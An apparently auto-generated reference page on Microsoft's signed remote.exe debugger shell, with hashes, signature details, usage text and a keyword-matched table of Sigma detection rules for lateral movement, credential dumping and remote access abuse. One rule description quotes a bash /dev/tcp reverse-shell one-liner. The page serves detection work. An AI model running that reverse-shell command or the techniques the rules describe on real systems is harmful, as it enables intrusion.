remote.exe

  • File Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
  • Description: Microsoft Remote Std I/O Shell

Hashes

  • MD5: C51957E9AFD84515C5F65A14B36FF144
  • SHA1: 6E81E8590B3DAE0C085F0A4181C48E58A9E16127
  • SHA256: D3E433D4595EB2240EDC914C67AB85D9308BCFC903B185302FE3BC52215C5E6B
  • SHA384: 577EFE93EBDE49B182A2EEA02A6070AF982A92CC44A18E8F88CF56B8180153DEBD4C7D706D24F9B6FCBC91EBE4888035
  • SHA512: 4D01E521683A68BD7FAEBDC354296667BAA7F7E2281C770D5C56CB8F00AE041AA11C012D80E97DD8E61A0D06011C2C80EA3FBA54A42318761239C1ACC1C2832F
  • SSDEEP: 768:Gt04y4dccel+YuNyPA6WBRI+M3UjrLw7Wov5YgTuyMpbAuSUlS5C:GactnC1Unkh5PTuZbAtU
  • IMP: 5C1E1DA49D61DC05F5D31D7C4F52EECB
  • PESHA1: CF98407A8D3E3897B7DBB10169F2449A80C808D1
  • PE256: D0CF21A9D1F6EC3DCCAB63EE4D80F30265BEB41E9104E98ABA7EF658DE098CB2

Runtime Data

Usage (stdout):


   To Start the SERVER end of REMOTE
   ---------------------------------
   Syntax : REMOTE /S <"Cmd">     <Unique Id> [Param]
   Example1: REMOTE /S "i386kd -v" imbroglio
            To interact with this "Cmd" from some other machine,
            start the client end using:  REMOTE /C A0D5F083-3197-4 imbroglio

   Example2: REMOTE /S "i386kd -v" "name with spaces"
            start the client end using:  REMOTE /C A0D5F083-3197-4 "name with spaces"

   To Exit: @K 
   [Param]: /F  <Foreground color eg yellow, black..>
   [Param]: /B  <Background color eg lblue, white..>
   [Param]: /U  username or groupname
                specifies which users or groups may connect
                may be specified more than once, e.g
                /U user1 /U group2 /U user2
   [Param]: /UD username or groupname
                specifically denies access to that user or group
   [Param]: /UL [filename]
                Filename of string format security descriptor.
                If no filename, then the REMOTE_SDDL_FILE environment
                variable is used.
   [Param]: /V  Makes this session visible to remote /Q
   [Param]: /-V Hides this session from remote /q (invisible)
                By default, if "Cmd" looks like a debugger,
                the session is visible, otherwise not


   To Start the CLIENT end of REMOTE
   ---------------------------------
   Syntax : REMOTE /C <ServerName> "<Unique Id>" [Param]
   Example1: REMOTE /C A0D5F083-3197-4 imbroglio
            This would connect to a server session on A0D5F083-3197-4 with Id
            "imbroglio" if there is a REMOTE /S <"Cmd"> imbroglio
            running on A0D5F083-3197-4.

   Example2: REMOTE /C A0D5F083-3197-4 "name with spaces"
            This would connect to a server session on A0D5F083-3197-4 with Id
            "name with spaces" if there is a REMOTE /S <"Cmd"> "name with spaces"
            running on A0D5F083-3197-4.

   To Exit: @Q (Leaves the Remote Server Running)
   [Param]: /L <# of Lines to Get>
   [Param]: /F <Foreground color eg blue, lred..>
   [Param]: /K <Set keywords and colors from file>
   [Param]: /B <Background color eg cyan, lwhite..>

   Keywords And Colors File Format
   -------------------------------
   <KEYWORDs - CASE INSENSITIVE>
   <FOREGROUND>[, <BACKGROUND>]
   ...
   EX:
       ERROR
       black, lred
       WARNING
       lblue
       COLOR THIS LINE
       lgreen

   To Query the visible sessions on a server
   -----------------------------------------
   Syntax:  REMOTE /Q A0D5F083-3197-4
            This would retrieve the available <Unique Id>s
            visible connections on the computer named A0D5F083-3197-4.


Loaded Modules:

  • C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
  • C:\Windows\SYSTEM32\ntdll.dll
  • C:\Windows\System32\wow64.dll
  • C:\Windows\System32\wow64cpu.dll
  • C:\Windows\System32\wow64win.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002CF6D2CC57CAA65A6D80000000002CF
  • Thumbprint: 1A221B3B4FEF088B17BA6704FD088DF192D9E0EF
  • Issuer: CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: remote.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: Unknown

Possible Misuse

The following table contains possible examples of remote.exe being misused. While remote.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Columns: Source, Source File, Example, License
sigma av_printernightmare_cve_2021_34527.yml description: Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675. DRL 1.0
sigma rpc_firewall_atsvc_lateral_movement.yml title: Remote Schedule Task Lateral Movement via ATSvc DRL 1.0
sigma rpc_firewall_atsvc_lateral_movement.yml description: Detects remote RPC calls to create or execute a scheduled task via ATSvc DRL 1.0
sigma rpc_firewall_atsvc_recon.yml title: Remote Schedule Task Recon via AtScv DRL 1.0
sigma rpc_firewall_atsvc_recon.yml description: Detects remote RPC calls to read information about scheduled tasks via AtScv DRL 1.0
sigma rpc_firewall_dcsync_attack.yml description: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks. DRL 1.0
sigma rpc_firewall_efs_abuse.yml title: Remote Encrypting File System Abuse DRL 1.0
sigma rpc_firewall_efs_abuse.yml description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR DRL 1.0
sigma rpc_firewall_efs_abuse.yml - Legitimate usage of remote file encryption DRL 1.0
sigma rpc_firewall_eventlog_recon.yml title: Remote Event Log Recon DRL 1.0
sigma rpc_firewall_eventlog_recon.yml description: Detects remote RPC calls to get event log information via EVEN or EVEN6 DRL 1.0
sigma rpc_firewall_eventlog_recon.yml - remote administrative tasks on Windows Events DRL 1.0
sigma rpc_firewall_itaskschedulerservice_lateral_movement.yml title: Remote Schedule Task Lateral Movement via ITaskSchedulerService DRL 1.0
sigma rpc_firewall_itaskschedulerservice_lateral_movement.yml description: Detects remote RPC calls to create or execute a scheduled task DRL 1.0
sigma rpc_firewall_itaskschedulerservice_recon.yml title: Remote Schedule Task Recon via ITaskSchedulerService DRL 1.0
sigma rpc_firewall_itaskschedulerservice_recon.yml description: Detects remote RPC calls to read information about scheduled tasks DRL 1.0
sigma rpc_firewall_printing_lateral_movement.yml title: Remote Printing Abuse for Lateral Movement DRL 1.0
sigma rpc_firewall_printing_lateral_movement.yml description: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR DRL 1.0
sigma rpc_firewall_remote_dcom_or_wmi.yml title: Remote DCOM/WMI Lateral Movement DRL 1.0
sigma rpc_firewall_remote_dcom_or_wmi.yml description: Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI. DRL 1.0
sigma rpc_firewall_remote_dcom_or_wmi.yml - Some administrative tasks on remote host DRL 1.0
sigma rpc_firewall_remote_registry_lateral_movement.yml title: Remote Registry Lateral Movement DRL 1.0
sigma rpc_firewall_remote_registry_lateral_movement.yml description: Detects remote RPC calls to modify the registry and possible execute code DRL 1.0
sigma rpc_firewall_remote_registry_lateral_movement.yml - Remote administration of registry values DRL 1.0
sigma rpc_firewall_remote_registry_recon.yml title: Remote Registry Recon DRL 1.0
sigma rpc_firewall_remote_registry_recon.yml description: Detects remote RPC calls to collect information DRL 1.0
sigma rpc_firewall_remote_registry_recon.yml - Remote administration of registry values DRL 1.0
sigma rpc_firewall_remote_server_service_abuse.yml title: Remote Server Service Abuse DRL 1.0
sigma rpc_firewall_remote_server_service_abuse.yml description: Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS DRL 1.0
sigma rpc_firewall_remote_server_service_abuse.yml - Legitimate remote share creation DRL 1.0
sigma rpc_firewall_remote_service_lateral_movement.yml title: Remote Server Service Abuse for Lateral Movement DRL 1.0
sigma rpc_firewall_remote_service_lateral_movement.yml description: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR DRL 1.0
sigma rpc_firewall_remote_service_lateral_movement.yml - Administrative tasks on remote services DRL 1.0
sigma rpc_firewall_sasec_lateral_movement.yml title: Remote Schedule Task Lateral Movement via SASec DRL 1.0
sigma rpc_firewall_sasec_lateral_movement.yml description: Detects remote RPC calls to create or execute a scheduled task via SASec DRL 1.0
sigma rpc_firewall_sasec_recon.yml title: Remote Schedule Task Lateral Movement via SASec DRL 1.0
sigma rpc_firewall_sasec_recon.yml description: Detects remote RPC calls to read information about scheduled tasks via SASec DRL 1.0
sigma rpc_firewall_sharphound_recon_account.yml description: Detects remote RPC calls used by SharpHound to map remote connections and local group membership. DRL 1.0
sigma rpc_firewall_sharphound_recon_sessions.yml description: Detects remote RPC calls used by SharpHound to map remote connections and local group membership. DRL 1.0
sigma lnx_auditd_create_account.yml description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. DRL 1.0
sigma lnx_auditd_network_service_scanning.yml description: Detects enumeration of local or remote network services. DRL 1.0
sigma lnx_auditd_web_rce.yml title: Webshell Remote Command Execution DRL 1.0
sigma lnx_file_copy.yml title: Remote File Copy DRL 1.0
sigma lnx_file_copy.yml description: Detects the use of tools that copy files from or to remote systems DRL 1.0
sigma proc_creation_macos_create_account.yml description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. DRL 1.0
sigma proc_creation_macos_network_service_scanning.yml description: Detects enumeration of local or remote network services. DRL 1.0
sigma proc_creation_macos_remote_system_discovery.yml title: Macos Remote System Discovery DRL 1.0
sigma proc_creation_macos_remote_system_discovery.yml description: Detects the enumeration of other remote systems. DRL 1.0
sigma net_connection_lnx_back_connect_shell_dev.yml description: Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') DRL 1.0
sigma proc_creation_lnx_network_service_scanning.yml description: Detects enumeration of local or remote network services. DRL 1.0
sigma proc_creation_lnx_remote_system_discovery.yml title: Linux Remote System Discovery DRL 1.0
sigma proc_creation_lnx_remote_system_discovery.yml description: Detects the enumeration of other remote systems. DRL 1.0
sigma cisco_cli_disable_logging.yml description: Turn off logging locally or remote DRL 1.0
sigma cisco_cli_input_capture.yml - Not commonly run by administrators, especially if remote logging is configured DRL 1.0
sigma cisco_cli_local_accounts.yml description: Find local accounts being created or modified as well as remote authentication configurations DRL 1.0
sigma cisco_cli_local_accounts.yml - When remote authentication is in place, this should not change often DRL 1.0
sigma zeek_dce_rpc_domain_user_enumeration.yml description: Domain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29 DRL 1.0
sigma zeek_dce_rpc_mitre_bzar_execution.yml description: 'Windows DCE-RPC functions which indicate an execution technique on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE' DRL 1.0
sigma zeek_dce_rpc_mitre_bzar_persistence.yml description: 'Windows DCE-RPC functions which indicate a persistence technique on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.' DRL 1.0
sigma zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam. DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). DRL 1.0
sigma zeek_dce_rpc_printnightmare_print_driver_install.yml - Legitimate remote alteration of a printer driver. DRL 1.0
sigma zeek_http_omigod_no_auth_rce.yml description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request. DRL 1.0
sigma zeek_rdp_public_listener.yml - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet. DRL 1.0
sigma zeek_smb_converted_win_atsvc_task.yml title: Remote Task Creation via ATSVC Named Pipe - Zeek DRL 1.0
sigma zeek_smb_converted_win_atsvc_task.yml description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe DRL 1.0
sigma zeek_smb_converted_win_impacket_secretdump.yml title: Possible Impacket SecretDump Remote Activity - Zeek DRL 1.0
sigma zeek_smb_converted_win_lm_namedpipe.yml title: First Time Seen Remote Named Pipe - Zeek DRL 1.0
sigma zeek_smb_converted_win_lm_namedpipe.yml description: This detection excludes known named pipes accessible remotely and notifies on newly observed ones; may help to detect lateral movement and remote exec using named pipes DRL 1.0
sigma proxy_download_susp_tlds_whitelist.yml description: Detects executable downloads from suspicious remote systems DRL 1.0
sigma web_cve_2010_5278_exploitation_attempt.yml possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to DRL 1.0
sigma web_cve_2020_0688_msexchange.yml - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ DRL 1.0
sigma web_cve_2020_5902_f5_bigip.yml - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ DRL 1.0
sigma web_fortinet_cve_2021_22123_exploit.yml cs-referer\|contains: '/root/user/remote-user/saml-user/' DRL 1.0
sigma web_vsphere_cve_2021_21972_unauth_rce_exploit.yml description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972 DRL 1.0
sigma win_software_atera_rmm_agent_install.yml description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators DRL 1.0
sigma win_vul_cve_2020_0688.yml - https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/ DRL 1.0
sigma win_susp_ntlm_rdp.yml title: Potential Remote Desktop Connection to Non-Domain Host DRL 1.0
sigma win_admin_rdp_login.yml title: Admin User Remote Logon DRL 1.0
sigma win_admin_rdp_login.yml description: Detect remote login by Administrator user (depending on internal pattern). DRL 1.0
sigma win_atsvc_task.yml title: Remote Task Creation via ATSVC Named Pipe DRL 1.0
sigma win_atsvc_task.yml description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe DRL 1.0
sigma win_exploit_cve_2021_1675_printspooler_security.yml description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 DRL 1.0
sigma win_gpo_scheduledtasks.yml - if the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks DRL 1.0
sigma win_impacket_secretdump.yml title: Possible Impacket SecretDump Remote Activity DRL 1.0
sigma win_lm_namedpipe.yml title: First Time Seen Remote Named Pipe DRL 1.0
sigma win_lm_namedpipe.yml description: This detection excludes known named pipes accessible remotely and notifies on newly observed ones; may help to detect lateral movement and remote exec using named pipes DRL 1.0
sigma win_lolbas_execution_of_nltest.yml - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc DRL 1.0
sigma win_mal_wceaux_dll.yml description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host DRL 1.0
sigma win_not_allowed_rdp_access.yml title: Denied Access To Remote Desktop DRL 1.0
sigma win_not_allowed_rdp_access.yml description: This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network. DRL 1.0
sigma win_remote_powershell_session.yml title: Remote PowerShell Sessions Network Connections (WinRM) DRL 1.0
sigma win_remote_powershell_session.yml - Legitimate use of remote PowerShell execution DRL 1.0
sigma win_remote_registry_management_using_reg_utility.yml title: Remote Registry Management Using Reg Utility DRL 1.0
sigma win_remote_registry_management_using_reg_utility.yml description: Remote registry management using REG utility from non-admin workstation DRL 1.0
sigma win_remote_registry_management_using_reg_utility.yml - Legitimate usage of remote registry management by administrator DRL 1.0
sigma win_scrcons_remote_wmi_scripteventconsumer.yml title: Remote WMI ActiveScriptEventConsumers DRL 1.0
sigma win_smb_file_creation_admin_shares.yml title: SMB Create Remote File Admin Share DRL 1.0
sigma win_susp_failed_logons_single_source_kerberos.yml - Remote administration tools DRL 1.0
sigma win_susp_failed_logons_single_source_kerberos2.yml - Remote administration tools DRL 1.0
sigma win_susp_failed_logons_single_source_kerberos3.yml - Remote administration tools DRL 1.0
sigma win_susp_failed_remote_logons_single_source.yml description: Detects a source system failing to authenticate against a remote host with multiple users. DRL 1.0
sigma win_susp_logon_explicit_credentials.yml title: Suspicious Remote Logon with Explicit Credentials DRL 1.0
sigma win_susp_samr_pwset.yml title: Possible Remote Password Change Through SAMR DRL 1.0
sigma win_susp_samr_pwset.yml description: Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events. DRL 1.0
sigma win_svcctl_remote_service.yml title: Remote Service Activity via SVCCTL Named Pipe DRL 1.0
sigma win_svcctl_remote_service.yml description: Detects remote service activity via remote access to the svcctl named pipe DRL 1.0
sigma win_svcctl_remote_service.yml - https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html DRL 1.0
sigma win_susp_failed_guest_logon.yml description: Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service DRL 1.0
sigma sysmon_cactustorch.yml title: CACTUSTORCH Remote Thread Creation DRL 1.0
sigma sysmon_cactustorch.yml description: Detects remote thread creation from CACTUSTORCH as described in references. DRL 1.0
sigma sysmon_cobaltstrike_process_injection.yml description: Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons DRL 1.0
sigma sysmon_cobaltstrike_process_injection.yml - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f DRL 1.0
sigma sysmon_password_dumper_lsass.yml title: Password Dumper Remote Thread in LSASS DRL 1.0
sigma sysmon_password_dumper_lsass.yml description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events. DRL 1.0
sigma sysmon_suspicious_remote_thread.yml title: Suspicious Remote Thread Created DRL 1.0
sigma sysmon_suspicious_remote_thread.yml to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml title: PowerShell Rundll32 Remote Thread Creation DRL 1.0
sigma sysmon_susp_powershell_rundll32.yml description: Detects PowerShell remote thread creation in Rundll32.exe DRL 1.0
sigma win_susp_rclone_exec.yml - ' remote ' DRL 1.0
sigma dns_query_win_gotoopener.yml title: Query to GoToAssist Remote Access Software Domain DRL 1.0
sigma dns_query_win_gotoopener.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma dns_query_win_gotoopener.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma dns_query_win_logmein.yml title: Query to LogMeIn Remote Access Software Domain DRL 1.0
sigma dns_query_win_logmein.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma dns_query_win_logmein.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma file_event_win_anydesk_artefact.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma file_event_win_anydesk_artefact.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma file_event_win_gotoopener_artefact.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma file_event_win_gotoopener_artefact.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma file_event_win_gotoopener_artefact.yml TargetFilename\|contains: '\AppData\Local\Temp\LogMeInInc\GoToAssist Remote Support Expert\' DRL 1.0
sigma file_event_win_screenconnect_artefact.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma file_event_win_screenconnect_artefact.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma file_event_win_susp_teamviewer_remote_session.yml title: TeamViewer Remote Session DRL 1.0
sigma file_event_win_susp_teamviewer_remote_session.yml description: Detects the creation of log files during a TeamViewer remote session DRL 1.0
sigma file_event_win_writing_local_admin_share.yml Adversaries may use to interact with a remote network share using Server Message Block (SMB). DRL 1.0
sigma image_load_svchost_dll_search_order_hijack.yml description: IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine. DRL 1.0
sigma image_load_wsman_provider_image_load.yml description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. DRL 1.0
sigma image_load_wsman_provider_image_load.yml - https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture DRL 1.0
sigma net_connection_win_python.yml description: Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation DRL 1.0
sigma net_connection_win_remote_powershell_session_network.yml title: Remote PowerShell Session DRL 1.0
sigma net_connection_win_remote_powershell_session_network.yml description: Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account. DRL 1.0
sigma net_connection_win_remote_powershell_session_network.yml - Legitimate usage of remote PowerShell, e.g. remote administration and monitoring. DRL 1.0
sigma net_connection_win_silenttrinity_stager_msbuild_activity.yml description: Detects a possible remote connections to Silenttrinity c2 DRL 1.0
sigma net_connection_win_susp_rdp.yml - Other Remote Desktop RDP tools DRL 1.0
sigma posh_pc_remote_powershell_session.yml title: Remote PowerShell Session DRL 1.0
sigma posh_pc_remote_powershell_session.yml description: Detects remote PowerShell sessions DRL 1.0
sigma posh_pc_remote_powershell_session.yml - Legitimate use remote PowerShell sessions DRL 1.0
sigma posh_pc_susp_get_nettcpconnection.yml description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. DRL 1.0
sigma posh_pm_remote_powershell_session.yml title: Remote PowerShell Session DRL 1.0
sigma posh_pm_remote_powershell_session.yml description: Detects remote PowerShell sessions DRL 1.0
sigma posh_pm_remote_powershell_session.yml - Legitimate use remote PowerShell sessions DRL 1.0
sigma posh_pm_suspicious_smb_share_reco.yml Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and DRL 1.0
sigma posh_pm_susp_get_nettcpconnection.yml description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. DRL 1.0
sigma posh_ps_capture_screenshots.yml Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations DRL 1.0
sigma posh_ps_enable_psremoting.yml title: Enable Windows Remote Management DRL 1.0
sigma posh_ps_enable_psremoting.yml description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. DRL 1.0
sigma posh_ps_enable_psremoting.yml - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management DRL 1.0
sigma posh_ps_invoke_command_remote.yml title: Execute Invoke-command on Remote Host DRL 1.0
sigma posh_ps_invoke_command_remote.yml description: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. DRL 1.0
sigma posh_ps_remote_session_creation.yml title: PowerShell Remote Session Creation DRL 1.0
sigma posh_ps_suspicious_extracting.yml Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. DRL 1.0
sigma posh_ps_suspicious_gwmi.yml description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers DRL 1.0
sigma posh_ps_suspicious_networkcredential.yml title: Suspicious Connection to Remote Account DRL 1.0
sigma posh_ps_suspicious_new_psdrive.yml description: Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. DRL 1.0
sigma posh_ps_suspicious_smb_share_reco.yml Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and DRL 1.0
sigma posh_ps_susp_invoke_webrequest_useragent.yml Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. DRL 1.0
sigma proc_access_win_mimikatz_trough_winrm.yml title: Mimikatz through Windows Remote Management DRL 1.0
sigma process_creation_apt_gamaredon_ultravnc.yml description: Gamaredon is known to use UltraVNC via command line for gaining remote access. DRL 1.0
sigma proc_creation_win_anydesk.yml title: Use of Anydesk Remote Access Software DRL 1.0
sigma proc_creation_win_anydesk.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma proc_creation_win_anydesk.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma proc_creation_win_anydesk_silent_install.yml description: AnyDesk Remote Desktop silent installation can be used by attacker to gain remote access. DRL 1.0
sigma proc_creation_win_evil_winrm.yml description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. DRL 1.0
sigma proc_creation_win_gotoopener.yml title: Use of GoToAssist Remote Access Software DRL 1.0
sigma proc_creation_win_gotoopener.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma proc_creation_win_gotoopener.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma proc_creation_win_logmein.yml title: Use of LogMeIn Remote Access Software DRL 1.0
sigma proc_creation_win_logmein.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma proc_creation_win_logmein.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma proc_creation_win_lolbas_configsecuritypolicy.yml remote: DRL 1.0
sigma proc_creation_win_lolbas_configsecuritypolicy.yml condition: lolbas and remote DRL 1.0
sigma proc_creation_win_lolbas_diantz_remote_cab.yml description: Download and compress a remote file and store it in a cab file on local machine. DRL 1.0
sigma proc_creation_win_mstsc.yml title: Remote Desktop Protocol Use Mstsc DRL 1.0
sigma proc_creation_win_mstsc.yml description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. DRL 1.0
sigma proc_creation_win_mstsc.yml - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol DRL 1.0
sigma proc_creation_win_powershell_download_patterns.yml - Software installers that pull packages from remote systems and execute them DRL 1.0
sigma proc_creation_win_remote_powershell_session_process.yml title: Remote PowerShell Session Host Process (WinRM) DRL 1.0
sigma proc_creation_win_remote_powershell_session_process.yml description: Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session). DRL 1.0
sigma proc_creation_win_remote_powershell_session_process.yml - Legitimate usage of remote Powershell, e.g. for monitoring purposes. DRL 1.0
sigma proc_creation_win_screenconnect.yml title: Use of ScreenConnect Remote Access Software DRL 1.0
sigma proc_creation_win_screenconnect.yml An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. DRL 1.0
sigma proc_creation_win_screenconnect.yml Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) DRL 1.0
sigma proc_creation_win_susp_add_user_remote_desktop.yml title: Suspicious Add User to Remote Desktop Users Group DRL 1.0
sigma proc_creation_win_susp_add_user_remote_desktop.yml description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group DRL 1.0
sigma proc_creation_win_susp_add_user_remote_desktop.yml - 'Remote Desktop Users' DRL 1.0
sigma proc_creation_win_susp_adidnsdump.yml - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump DRL 1.0
sigma proc_creation_win_susp_cipher.yml Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives DRL 1.0
sigma proc_creation_win_susp_msoffice.yml description: Downloads payload from remote server DRL 1.0
